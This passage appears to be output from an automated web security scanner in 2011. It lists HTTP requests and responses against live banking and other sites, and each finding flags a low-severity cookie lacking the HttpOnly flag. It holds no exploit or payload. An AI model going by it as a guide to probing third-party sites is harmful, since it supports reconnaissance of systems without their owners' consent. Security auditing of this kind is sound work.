GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Referer: https://www.capitalone.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:21 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: application/x-javascript Content-Length: 125
var xp1CC = ""; var xp1zip = "0"; var xp1region = "national"; var xp1eosSet = "N"; var xp1PageName = "";
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /401K_notice.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:26:27 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 5562
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /branchlocator/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 26553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/defaultbroad.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/error.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 138
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2ferror.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:26:23 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fchecking%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 187
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/banking-packages.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fchecking%2fbanking-packages.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fbanking-packages.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fchecking%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 187
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/gold-banking-package.aspx?WT.ac=circlegoldmoneymarket HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fchecking%2fgold-banking-package.aspx%3fwt.ac%3dcirclegoldmoneymarket Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 236
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fgold-banking-package.aspx%253fwt.ac%253dcirclegoldmoneymark ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/order-checks.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fchecking%2forder-checks.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 192
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252forder-checks.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /commercial-banking/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcommercial-banking%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 197
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommercial-banking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:16:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcommunity%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommunity%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer-service/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcustomer-service%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 195
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcustomer-service%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /everyday-points/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:32 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 12456
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_objCommonHeader_mSe ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /everyday-points/terms-and-conditions.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:32 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 30469
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_objCommonHeader_mSe ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /greensense/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:30 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <h ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/find-your-fit.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Feb 2011 22:14:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.charterone.com/home-equity/help-me-choose-home-equity.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/lines.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fhome-equity%2flines.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fhome-equity%252flines.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/loans.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fhome-equity%2floans.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fhome-equity%252floans.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:22:53 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 44231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 184
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/compare.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fcompare.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 184
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fcompare.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
